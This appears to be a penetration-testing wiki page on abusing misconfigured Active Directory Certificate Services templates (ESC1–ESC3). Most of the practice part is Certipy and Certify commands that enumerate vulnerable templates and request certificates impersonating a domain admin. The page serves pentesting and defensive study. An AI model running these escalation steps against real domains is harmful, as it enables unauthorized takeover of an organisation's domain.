Certificate templates

Theory

AD CS Enterprise CAs issue certificates with settings defined by AD objects known as certificate templates. These templates are collections of enrollment policies and predefined certificate settings and contain things like โ€œHow long is this certificate valid for?โ€, โ€œWhat is the certificate used for?โ€, โ€œHow is the subject specified?โ€, โ€œWho is allowed to request a certificate?โ€, and a myriad of other settings
[...]
There is a specific set of settings for certificate templates that makes them extremely vulnerable. As in regular-domain-user-to-domain-admin vulnerable.
In their research papers, Will Schroeder and Lee Christensen found multiple vectors of domain escalation based on certificate template misconfigurations (dubbed ESC1, ESC2 and ESC3).
Vulnerable configurations for ESC1, ESC2 and ESC3

Practice

Template allows SAN (ESC1)

When a certificate template allows to specify a subjectAltName, it is possible to request a certificate for another user. It can be used for privileges escalation if the EKU specifies Client Authentication or ANY.
UNIX-like
Windows
From UNIX-like systems, Certipy (Python) can be used to enumerate for, and conduct, the ESC1 and ESC2 scenarios. It is possible to output the result in an archive that can be uploaded in Bloodhound.
1
certipy find 'domain.local'/'user':'password'@'domaincontroller' -bloodhound
Copied!
Certipy's auto mode can also be used to automatically find and abuse misconfigured certificate temp
Once a vulnerable template is found, a request shall be made to obtain a certificate.
1
certipy req 'domain.local'/'user':'password'@'ca_server' -ca 'ca_name' -template 'vulnerable template' -alt 'domain admin'
Copied!
The certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.
By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.
From Windows systems, the Certify (C#) tool can be used.
1
# Find vulnerable/abusable certificate templates using default low-privileged group
2
Certify.exe find /vulnerable
3
โ€‹
4
# Find vulnerable/abusable certificate templates using all groups the current user context is a part of:
5
Certify.exe find /vulnerable /currentuser
Copied!
Once a vulnerable template is found, a request shall be made to obtain a certificate, with another high-priv user set as SAN (subjectAltName).
1
Certify.exe request /ca:'domain\ca' /template:"Vulnerable template" /altname:"admin"
Copied!
The certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.

Any purpose EKU (ESC2)

When a certificate template specifies the Any Purpose EKU, or no EKU at all, the certificate can be used for anything. ESC2 can't be abused like ESC1 if the requester can't specify a SAN, however, it can be abused like ESC3 to use the certificate as requirement to request another one on behalf of any user.

Certificate Agent EKU (ESC3)

When a certificate template specifies the Certificate Request Agent EKU, it is possible to use the issued certificate from this template to request another certificate on behalf of any user.
UNIX-like
Windows
From UNIX-like systems, Certipy (Python) can be used to enumerate for, and conduct, the ESC3 scenario. It is possible to output the result in an archive that can be uploaded in Bloodhound.
1
certipy find 'domain.local'/'user':'password'@'domain_controller' -bloodhound
Copied!
Once a vulnerable template is found, a request shall be made to obtain a certificate specifying the Certificate Request Agent EKU.
1
certipy req 'domain.local'/'user':'password'@'ca_server' -ca 'ca_name' -template 'vulnerable template'
Copied!
Then, the issued certificate can be used to request another certificate permitting Client Authentication on behalf of another user.
1
certipy req 'domain.local'/'user':'password'@'ca_server' -ca 'ca_name' -template 'User' -on-behalf-of 'domain\domain admin' -pfx 'user.pfx'
Copied!
By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.
From Windows systems, the Certify (C#) tool can be used.
1
# Find vulnerable/abusable certificate templates using default low-privileged group
2
Certify.exe find /vulnerable
3
โ€‹
4
# Find vulnerable/abusable certificate templates using all groups the current user context is a part of:
5
Certify.exe find /vulnerable /currentuser
Copied!
Once a vulnerable template is found, a request shall be made to obtain a certificate specifying the Certificate Request Agent EKU.
1
Certify.exe request /ca:'domain\ca' /template:"Vulnerable template"
Copied!
Then, the issued certificate can be used to request another certificate permitting Client Authentication on behalf of another user.
1
Certify.exe request /ca:'domain\ca' /template:"User" /onbehalfon:DOMAIN\Admin /enrollcert:enrollmentAgentCert.pfx /enrollcertpw:Passw0rd!
Copied!

Resources

https://posts.specterops.io/certified-pre-owned-d95910965cd2
posts.specterops.io
Certipy 2.0: BloodHound, New Escalations, Shadow Credentials, Golden Certificates, and more!
Medium